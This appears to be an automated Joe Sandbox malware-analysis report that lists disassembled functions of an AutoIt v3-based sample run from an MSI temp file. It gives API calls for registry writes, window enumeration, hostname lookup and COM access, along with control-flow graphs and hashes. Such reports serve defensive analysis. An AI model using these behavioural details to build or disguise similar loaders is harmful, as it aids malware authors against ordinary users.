                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 007A711E
                                        • __dosmaperr.LIBCMT ref: 007A7125
                                        • __free_osfhnd.LIBCMT ref: 007A7145
                                        • __invoke_watson.LIBCMT ref: 007A7173
                                        • __wsopen_helper.LIBCMT ref: 007A718D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                        • String ID: 9Ay$@
                                        • API String ID: 3896587723-2511331675
                                        • Opcode ID: 85285d46ac969299fb077dd53406151bd065e7f8d17128bcb1ae5124dc15d8f4
                                        • Instruction ID: 3780cb3f49fa9bdb97a245ac70967474d59b4e81cc6ade1734e94a5be3d83e6b
                                        • Opcode Fuzzy Hash: 85285d46ac969299fb077dd53406151bd065e7f8d17128bcb1ae5124dc15d8f4
                                        • Instruction Fuzzy Hash: 17220571A042059FEF299F68DC55BBE7B61EB82324F288329E521AB2D1C73D8D50C761
                                        Function 007B76DB Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • GetFileVersionInfoSizeW.KERNELBASE(?,?), ref: 007B76ED
                                        • GetFileVersionInfoW.KERNELBASE(?,00000000,00000000,00000000,?,?), ref: 007B7713
                                        • _wcscpy.LIBCMT ref: 007B7741
                                        • _wcscmp.LIBCMT ref: 007B774C
                                        • _wcscat.LIBCMT ref: 007B7762
                                        • _wcsstr.LIBCMT ref: 007B776D
                                        • 751C1560.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 007B7789
                                        • _wcscat.LIBCMT ref: 007B77D2
                                        • _wcscat.LIBCMT ref: 007B77D9
                                        • _wcsncpy.LIBCMT ref: 007B7804
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _wcscat$FileInfoVersion$C1560Size_wcscmp_wcscpy_wcsncpy_wcsstr
                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                        • API String ID: 2588870415-1459072770
                                        • Opcode ID: 149b811ceb7a7dfa34b459d4525a0aa5e0928e79c4f35d84c60317a9920c165c
                                        • Instruction ID: ab705861725a5cd6076fdece7e24aaa3414ef8abc4460e89e3a8d9e24ef7d557
                                        • Opcode Fuzzy Hash: 149b811ceb7a7dfa34b459d4525a0aa5e0928e79c4f35d84c60317a9920c165c
                                        • Instruction Fuzzy Hash: 3F41D371A44204FEEF05B764AC4BFBF77ACEF55720F504069F400E6282EB6CAA41D6A1
                                        Function 00771F04 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 346COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 608 771f04-771f9c call 772d1a * 2 call 77c935 * 2 call 777e53 call 77d3d2 * 3 625 771fa2-771fa6 608->625 626 7e2569-7e2575 call 792626 608->626 628 7e257d-7e2583 call 7ae4ea 625->628 629 771fac-771faf 625->629 626->628 631 7e258f-7e259b call 77a4f6 628->631 629->631 632 771fb5-771fb8 629->632 639 7e2899-7e289d 631->639 640 7e25a1-7e25b1 call 77a4f6 631->640 632->631 635 771fbe-771fc7 GetForegroundWindow call 77200a 632->635 641 771fcc-771fe3 call 77197e 635->641 642 7e289f-7e28a6 call 77c935 639->642 643 7e28ab-7e28ae 639->643 640->639 654 7e25b7-7e25c5 640->654 651 771fe4-772007 call 775cd3 * 3 641->651 642->643 647 7e28b7-7e28c4 643->647 648 7e28b0 643->648 652 7e28d6-7e28da 647->652 653 7e28c6-7e28d4 call 77b8a7 CharUpperBuffW 647->653 648->647 658 7e28dc-7e28df 652->658 659 7e28f1-7e28fa 652->659 653->652 657 7e25c9-7e25e1 call 7ad68d 654->657 657->639 672 7e25e7-7e25f7 call 78f885 657->672 658->659 663 7e28e1-7e28ef call 77b8a7 CharUpperBuffW 658->663 664 7e28fc-7e2909 GetDesktopWindow EnumChildWindows 659->664 665 7e290b EnumWindows 659->665 663->659 666 7e2911-7e2930 call 7ae44e call 772d1a 664->666 665->666 683 7e2932-7e293b call 77200a 666->683 684 7e2940 666->684 681 7e25fd-7e260d call 78f885 672->681 682 7e287b-7e288b call 78f885 672->682 692 7e2613-7e2623 call 78f885 681->692 693 7e2861-7e2871 call 78f885 681->693 690 7e288d-7e2891 682->690 691 7e2873-7e2876 682->691 683->684 690->651 696 7e2897 690->696 700 7e281d-7e2836 call 7b88a2 IsWindow 692->700 701 7e2629-7e2639 call 78f885 692->701 693->691 702 7e2842-7e2848 GetForegroundWindow 693->702 699 7e2852-7e2858 696->699 699->693 700->651 712 7e283c-7e2840 700->712 710 7e263b-7e2640 701->710 711 7e2659-7e2669 call 78f885 701->711 703 7e2849-7e2850 call 77200a 702->703 703->699 713 7e280d-7e280f 710->713 714 7e2646-7e2657 call 775cf6 710->714 720 7e267a-7e268a call 78f885 711->720 721 7e266b-7e2675 711->721 712->703 717 7e2817-7e2818 713->717 722 7e269b-7e26a7 call 775be9 714->722 717->651 728 7e268c-7e2698 call 775cf6 720->728 729 7e26b5-7e26c5 call 78f885 720->729 723 7e27e6-7e27f0 call 77c935 721->723 734 7e26ad-7e26b0 722->734 735 7e2811-7e2813 722->735 733 7e2804-7e2808 723->733 728->722 739 7e26c7-7e26de call 792241 729->739 740 7e26e3-7e26f3 call 78f885 729->740 733->657 734->733 735->717 739->733 745 7e26f5-7e270c call 792241 740->745 746 7e2711-7e2721 call 78f885 740->746 745->733 751 7e273f-7e274f call 78f885 746->751 752 7e2723-7e273a call 792241 746->752 757 7e276d-7e277d call 78f885 751->757 758 7e2751-7e2768 call 792241 751->758 752->733 763 7e277f-7e2793 call 792241 757->763 764 7e2795-7e27a5 call 78f885 757->764 758->733 763->733 769 7e27a7-7e27b7 call 78f885 764->769 770 7e27c3-7e27d3 call 78f885 764->770 769->691 775 7e27bd-7e27c1 769->775 776 7e27d5-7e27da 770->776 777 7e27f2-7e2802 call 7ad614 770->777 775->733 778 7e27dc-7e27e2 776->778 779 7e2815 776->779 777->691 777->733 778->723 779->717
                                        APIs
                                          • Part of subcall function 00777E53: _memmove.LIBCMT ref: 00777EB9
                                        • GetForegroundWindow.USER32 ref: 00771FBE
                                        • IsWindow.USER32(?), ref: 007E282E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Window$Foreground_memmove
                                        • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                        • API String ID: 3828923867-1919597938
                                        • Opcode ID: 59459459cf16e028bbab96cb0717566f25fb3fda1a35ae970bce40397eb6e817
                                        • Instruction ID: fa0239cf3a8363a55e554267120248d4d35a3098d760cd3a7646f87318eb350e
                                        • Opcode Fuzzy Hash: 59459459cf16e028bbab96cb0717566f25fb3fda1a35ae970bce40397eb6e817
                                        • Instruction Fuzzy Hash: 9CD14C30105342EBCF04EF25C444AA9BBA5FF58394F148A2DF455975A3CB38E99BCB92
                                        Function 007D352A Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 782 7d352a-7d3569 call 77d3d2 * 3 789 7d356b-7d356e 782->789 790 7d3574-7d35e7 call 7784a6 call 7d3d7b call 7d3af7 782->790 789->790 791 7d35f9-7d360d call 782570 789->791 804 7d35e9-7d35f4 call 7bd7e4 790->804 805 7d3612-7d3617 790->805 797 7d3a94-7d3ab7 call 775cd3 * 3 791->797 804->791 806 7d366d 805->806 807 7d3619-7d362e RegConnectRegistryW 805->807 812 7d3671-7d369c RegCreateKeyExW 806->812 810 7d3667-7d366b 807->810 811 7d3630-7d3662 call 777ba9 call 7bd7e4 call 782570 807->811 810->812 811->797 815 7d369e-7d36d2 call 777ba9 call 7bd7e4 call 782570 812->815 816 7d36e7-7d36ec 812->816 815->797 838 7d36d8-7d36e2 RegCloseKey 815->838 819 7d3a7b-7d3a8c RegCloseKey 816->819 820 7d36f2-7d3715 call 7784a6 call 791bc7 816->820 819->797 824 7d3a8e-7d3a92 RegCloseKey 819->824 836 7d3717-7d376d call 7784a6 call 7918fb call 7784a6 * 2 RegSetValueExW 820->836 837 7d3796-7d37b6 call 7784a6 call 791bc7 820->837 824->797 836->819 861 7d3773-7d3791 call 777ba9 call 782570 836->861 848 7d37bc-7d3814 call 7784a6 call 7918fb call 7784a6 * 2 RegSetValueExW 837->848 849 7d3840-7d3860 call 7784a6 call 791bc7 837->849 838->797 848->819 879 7d381a-7d383b call 777ba9 call 782570 848->879 862 7d3949-7d3969 call 7784a6 call 791bc7 849->862 863 7d3866-7d38c9 call 7784a6 call 79010a call 7784a6 call 773b1e 849->863 880 7d3a74 861->880 882 7d396b-7d398b call 77cdb4 call 7784a6 862->882 883 7d39c6-7d39e6 call 7784a6 call 791bc7 862->883 899 7d38e9-7d3918 call 7784a6 RegSetValueExW 863->899 900 7d38cb-7d38d0 863->900 879->819 880->819 905 7d398d-7d39a1 RegSetValueExW 882->905 902 7d39e8-7d3a0e call 77d00b call 7784a6 883->902 903 7d3a13-7d3a30 call 7784a6 call 791bc7 883->903 914 7d393d-7d3944 call 79017e 899->914 915 7d391a-7d3936 call 777ba9 call 782570 899->915 906 7d38d8-7d38db 900->906 907 7d38d2-7d38d4 900->907 902->905 930 7d3a67-7d3a71 call 782570 903->930 931 7d3a32-7d3a60 call 7bbe47 call 7784a6 call 7bbe8a 903->931 905->819 911 7d39a7-7d39c1 call 777ba9 call 782570 905->911 906->900 912 7d38dd-7d38df 906->912 907->906 911->880 912->899 918 7d38e1-7d38e5 912->918 914->819 915->914 918->899 930->880 931->930
                                        APIs
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007D3626
                                        • RegCreateKeyExW.KERNEL32(?,?,00000000,0080DBF0,00000000,?,00000000,?,?), ref: 007D3694
                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 007D36DC
                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 007D3765
                                        • RegCloseKey.ADVAPI32(?), ref: 007D3A85
                                        • RegCloseKey.ADVAPI32(00000000), ref: 007D3A92
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Close$ConnectCreateRegistryValue
                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                        • API String ID: 536824911-966354055
                                        • Opcode ID: e964dc40dda46604a1edd284cf6321e0071db730dd9e86c4d3a18119fb3658bd
                                        • Instruction ID: 0ac424602c2b8afe0c2edf6948a605c7cc27f0d048be4a776f9d507f36f06e9e
                                        • Opcode Fuzzy Hash: e964dc40dda46604a1edd284cf6321e0071db730dd9e86c4d3a18119fb3658bd
                                        • Instruction Fuzzy Hash: 99021A75200601DFCB14EF24C899E2AB7E5FF89760F048559F88A9B361DB78ED41CB52
                                        Function 00774257 Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 235COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Installer\MSI77F6.tmp,00000104,?,00000000,00000001,00000000), ref: 0077428C
                                          • Part of subcall function 0077CAEE: _memmove.LIBCMT ref: 0077CB2F
                                          • Part of subcall function 00791BC7: __wcsicmp_l.LIBCMT ref: 00791C50
                                        • _wcscpy.LIBCMT ref: 007743C0
                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Installer\MSI77F6.tmp,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 007E214E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
                                        • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Windows\Installer\MSI77F6.tmp$CMDLINE$CMDLINERAW
                                        • API String ID: 861526374-1733472223
                                        • Opcode ID: 8b23c2eef856bb43b63c42adbf427dd9c8a39d25ec863419b3ad9b8a158276ca
                                        • Instruction ID: af6c75db8be9a6c45350821e17779300b3fd13f529c351faf4e73b0b18d4643c
                                        • Opcode Fuzzy Hash: 8b23c2eef856bb43b63c42adbf427dd9c8a39d25ec863419b3ad9b8a158276ca
                                        • Instruction Fuzzy Hash: 25818272900259EACF05EBE0CC5AEEF77B8FF45790F504015E509B7192EB686B05CBA1
                                        Function 0078E975 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 170COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0078EA39
                                        • __wsplitpath.LIBCMT ref: 0078EA56
                                          • Part of subcall function 0079297D: __wsplitpath_helper.LIBCMT ref: 007929BD
                                        • _wcsncat.LIBCMT ref: 0078EA69
                                        • __makepath.LIBCMT ref: 0078EA85
                                          • Part of subcall function 00792BFF: __wmakepath_s.LIBCMT ref: 00792C13
                                          • Part of subcall function 0079010A: std::exception::exception.LIBCMT ref: 0079013E
                                          • Part of subcall function 0079010A: __CxxThrowException@8.LIBCMT ref: 00790153
                                        • _wcscpy.LIBCMT ref: 0078EABE
                                          • Part of subcall function 0078EB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,0078EADA,?,?), ref: 0078EB27
                                        • _wcscat.LIBCMT ref: 007E32FC
                                        • _wcscat.LIBCMT ref: 007E3334
                                        • _wcsncpy.LIBCMT ref: 007E3370
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                                        • String ID: '/{$Include$\
                                        • API String ID: 1213536620-437149038
                                        • Opcode ID: 31f5630b54bed1d031f7cb8b8b5e825cc0ec25136bd3c92a06b4cbd76da06bae
                                        • Instruction ID: 5c612f8a9fc6501f81cf8502c5a26515359028a2e585f93d3076e31e7050f3ef
                                        • Opcode Fuzzy Hash: 31f5630b54bed1d031f7cb8b8b5e825cc0ec25136bd3c92a06b4cbd76da06bae
                                        • Instruction Fuzzy Hash: 6A513DB1404341AFC715EF99EC89C9BB7E8FB8D310F80492EF54987261EB789644CB66
                                        Function 007B78EE Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72networkCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1143 7b78ee-7b7911 WSAStartup 1144 7b79b1-7b79bd call 791943 1143->1144 1145 7b7917-7b7938 gethostname gethostbyname 1143->1145 1153 7b79be-7b79c1 1144->1153 1145->1144 1147 7b793a-7b7941 1145->1147 1149 7b794e-7b7950 1147->1149 1150 7b7943 1147->1150 1151 7b7952-7b795f call 791943 1149->1151 1152 7b7961-7b79a6 call 78faa0 inet_ntoa call 793220 call 7b8553 call 791943 call 79017e 1149->1152 1154 7b7945-7b794c 1150->1154 1159 7b79a9-7b79af WSACleanup 1151->1159 1152->1159 1154->1149 1154->1154 1159->1153
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                        • String ID: 0.0.0.0
                                        • API String ID: 208665112-3771769585
                                        • Opcode ID: c01a777dea57ec198feae01b3352a272ad5161ffc797b649d8e73cb1e8c23888
                                        • Instruction ID: c4083899449ed37c7ff7e86be68bf1ae6ade82d637ed7590ada63418fe6bad21
                                        • Opcode Fuzzy Hash: c01a777dea57ec198feae01b3352a272ad5161ffc797b649d8e73cb1e8c23888
                                        • Instruction Fuzzy Hash: 4711D231A08115AFDF38A760AC4AFEA77ACEF41720F004065F45596191EE7CEA81C6A4
                                        Function 007730A5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • GetSysColorBrush.USER32(0000000F), ref: 007730B0
                                        • LoadCursorW.USER32(00000000,00007F00), ref: 007730BF
                                        • LoadIconW.USER32(00000063), ref: 007730D5
                                        • LoadIconW.USER32(000000A4), ref: 007730E7
                                        • LoadIconW.USER32(000000A2), ref: 007730F9
                                          • Part of subcall function 0077318A: LoadImageW.USER32(00770000,00000063,00000001,00000010,00000010,00000000), ref: 007731AE
                                        • RegisterClassExW.USER32(?), ref: 00773167
                                          • Part of subcall function 00772F58: GetSysColorBrush.USER32(0000000F), ref: 00772F8B
                                          • Part of subcall function 00772F58: RegisterClassExW.USER32(00000030), ref: 00772FB5
                                          • Part of subcall function 00772F58: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00772FC6
                                          • Part of subcall function 00772F58: LoadIconW.USER32(000000A9), ref: 00773009
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                        • String ID: #$0$AutoIt v3
                                        • API String ID: 2880975755-4155596026
                                        • Opcode ID: 8800caa57000919e008410fa212776ac6c4af068caaa91100318ce27046f99bf
                                        • Instruction ID: 9c10b3bba00de5e3b42b6a0aa85a5ee5a2d2277b628a8dcc39581f146f5a206b
                                        • Opcode Fuzzy Hash: 8800caa57000919e008410fa212776ac6c4af068caaa91100318ce27046f99bf
                                        • Instruction Fuzzy Hash: C2213170E00304ABDF14DFA9EC4DA9DBBF5FB88750F00892AE618A62A0D7794544DF95
                                        Function 007CB74B Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1342 7cb74b-7cb7ac VariantInit call 77ca8e CoInitialize 1345 7cb7ae CoUninitialize 1342->1345 1346 7cb7b4-7cb7c7 call 78d5f6 1342->1346 1345->1346 1349 7cb7c9-7cb7d0 call 77ca8e 1346->1349 1350 7cb7d5-7cb7dc 1346->1350 1349->1350 1352 7cb7de-7cb805 call 7784a6 call 7aa857 1350->1352 1353 7cb81b-7cb85b call 7784a6 call 78f885 1350->1353 1352->1353 1364 7cb807-7cb816 call 7cc235 1352->1364 1362 7cb861-7cb86e 1353->1362 1363 7cb9d3-7cba17 SetErrorMode CoGetInstanceFromFile 1353->1363 1365 7cb8a8-7cb8b6 GetRunningObjectTable 1362->1365 1366 7cb870-7cb881 call 78d5f6 1362->1366 1367 7cba1f-7cba3a CoGetObject 1363->1367 1368 7cba19-7cba1d 1363->1368 1381 7cbad0-7cbae3 VariantClear 1364->1381 1370 7cb8b8-7cb8c9 1365->1370 1371 7cb8d5-7cb8e8 call 7cc235 1365->1371 1384 7cb8a0 1366->1384 1385 7cb883-7cb88d call 77cdb4 1366->1385 1374 7cba3c 1367->1374 1375 7cbab5-7cbac5 call 7cc235 SetErrorMode 1367->1375 1373 7cba40-7cba47 SetErrorMode 1368->1373 1389 7cb8ed-7cb8fc 1370->1389 1390 7cb8cb-7cb8d0 1370->1390 1391 7cbac7-7cbacb call 775cd3 1371->1391 1380 7cba4b-7cba51 1373->1380 1374->1373 1375->1391 1387 7cbaa8-7cbaab 1380->1387 1388 7cba53-7cba55 1380->1388 1384->1365 1385->1384 1402 7cb88f-7cb89e call 77cdb4 1385->1402 1387->1375 1393 7cba8d-7cbaa6 call 7ba6f6 1388->1393 1394 7cba57-7cba78 call 7aac4b 1388->1394 1401 7cb907-7cb91b 1389->1401 1390->1371 1391->1381 1393->1391 1394->1393 1403 7cba7a-7cba83 1394->1403 1408 7cb9bb-7cb9d1 1401->1408 1409 7cb921-7cb925 1401->1409 1402->1365 1403->1393 1408->1380 1409->1408 1410 7cb92b-7cb940 1409->1410 1413 7cb9a2-7cb9ac 1410->1413 1414 7cb942-7cb957 1410->1414 1413->1401 1414->1413 1418 7cb959-7cb983 call 7aac4b 1414->1418 1422 7cb994-7cb99e 1418->1422 1423 7cb985-7cb98d 1418->1423 1422->1413 1424 7cb98f-7cb990 1423->1424 1425 7cb9b1-7cb9b6 1423->1425 1424->1422 1425->1408
                                        APIs
                                        • VariantInit.OLEAUT32(?), ref: 007CB777
                                        • CoInitialize.OLE32(00000000), ref: 007CB7A4
                                        • CoUninitialize.COMBASE ref: 007CB7AE
                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 007CB8AE
                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 007CB9DB
                                        • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002), ref: 007CBA0F
                                        • CoGetObject.OLE32(?,00000000,007FD91C,?), ref: 007CBA32
                                        • SetErrorMode.KERNEL32(00000000), ref: 007CBA45
                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 007CBAC5
                                        • VariantClear.OLEAUT32(007FD91C), ref: 007CBAD5
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
